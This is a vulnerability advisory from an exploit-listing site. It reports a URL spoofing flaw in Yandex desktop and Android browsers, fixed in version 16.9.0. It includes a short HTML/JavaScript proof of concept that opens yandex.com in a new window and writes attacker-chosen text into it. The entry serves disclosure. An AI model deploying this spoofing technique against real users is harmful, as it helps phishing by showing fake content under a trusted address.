Yandex Desktop & Mobile Browser URL Spoofing

2016.09.07
pl Smash_ (PL) pl
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Yandex Desktop & Mobile Browser URL Spoofing # Vendor: https://browser.yandex.com/ # Author: Patryk Bogdan Tested on: Yandex Desktop Browser 16.6.0.8608 (Windows) Yandex Mobile Browser Alpha 16.6.1.8686 (Android) Yandex Mobile Browser Beta 16.6.0.8802 (Android) Fix: Update to version 16.9.0 PoC: <html> <head><title>Yandex Desktop & Mobile Browser URL Spoofing</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> </head> <body> <button id="poc">Run PoC</button> <script type="text/javascript"> document.getElementById('poc').onclick = function() { win=window.open('http://yandex.com/'); win.document.write("Hello, this is spoofed content."); } </script> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top